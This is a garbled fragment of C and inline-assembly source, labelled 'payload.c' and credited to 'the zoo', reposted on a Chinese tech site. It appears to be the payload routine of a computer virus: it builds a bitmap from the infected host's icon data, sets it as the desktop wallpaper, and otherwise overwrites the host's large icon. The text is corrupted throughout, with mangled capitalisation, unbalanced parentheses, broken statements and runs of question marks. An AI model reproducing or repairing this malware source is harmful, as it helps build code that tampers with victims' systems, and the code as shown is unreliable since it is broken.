HBMP = CREATEFILE (Pathname, Generic_Write, 0, NULL, OPEN_ALWAYS,

FILE_ATTRIBUTE_NORMAL, 0);

IF (HBMP! = Invalid_Handle_Value)

IF (GetFileSize (hbmp, null) == sizeof_bmp) {

CloseHandle (HBMP);

Goto setDeskwallpaper;

}

Else {

{

PBYTE PSRC = HostLargeicon;

PBYTE PTGT = JQ29ABMP 0XE;

DWORD NCOUNT = 0x68;

* (PDWORD) (PTGT - 0xE) = 0x80764d42;

PTGT [0xA - 0xE] = 0x76;

Do * ptgt = * psrc ; while (--ncount);

(PbitmapInfoHead) (PTGT - 0x68)) -> BiWidth = 0x100;

(PbitmapInfoHeader) (PTGT - 0x68)) -> Biheight = 0x100;

* (PBITE) & (PbitmapInfoHead) -> BisizeImage 1)

= 0x80;

* (PWORD) & (PbitmapInfoHead) (PTGT - 0x68)) -> Bixpelspermeter

= 0xecE;

* (PWORD) & (PbitmapInfoHead) (PTGT - 0x68)) -> Biypelspermeter

= 0xed8;

PSRC = 0x200;

{

DWORD NCOUNTDWORDS = 32;

Do {

DWORD NCOUNTYPELS = 8;

DWORD PIX = * (PDWORD) PSRC) ;

__ASM {

MOV EAX, [PIX]

XCHG AH, Al

ROL EAX, 16

XCHG AH, Al

MOV [PIX], EAX

}

Do {

DWORD PIXCOPY = PIX;

DWORD NCOUNTBITS = 32;

Do {

DWORD NCOUNTXPELS = 4;

Do {

* PTGT = (PIXCOPY & 0x80000000)? 0x66: 0;

} while (--ncountxpels); pixcopy << = 1;

WHILE (--NCOUNTBITS);

While (--NCOUNTYPELS);

WHILE (--NCOUNTDWORDS);

}

{

Bool Bbool = Writefile (HBMP, JQ29ABMP, SizeOf_BMP, & CBYTES,

NULL);

Writefile (HBMP, JQ29ABMP, 0, & CBytes, NULL);

CloseHandle (HBMP);

IF (bbool) {

Hinstance hinst; setdeskwallpaper:

Hinst = loadingLibrary ("User32");

IF (hinst) {

DWORD (WinApi * PfnsystemParametersInfo) (DWORD, DWORD,

PVOID, DWORD;

PfnsystemParametersInfo =

(DWORD (WinApi *) (DWORD, DWORD, PVOID, DWORD)

GetProcadDress (Hinst, "SystemParametersInfoa);

IF (PFNSYSTEMPARETERSINFO)

PfnsystemParametersInfo (SPI_SETDESKWALLPAPER,

Pathname,

Spif_updateinifile;

Freelibrary (HINST);

}

#ELSE

{

PBYTE PTGT = HostLargeicon;

PBYTE PSRC = JQ29AICONS;

DWORD NCOUNT = SIZEOF_ICONS;

Do * ptgt = * psrc while (--ncount);

}

#ENDIF

}

??????????????????????????????????????????? ??????????????? [payload.c]??

Chaght to you by 'the zoo'!

转载请注明原文地址:https://www.9cbs.com/read-37080.html

9cbs

New Post(0)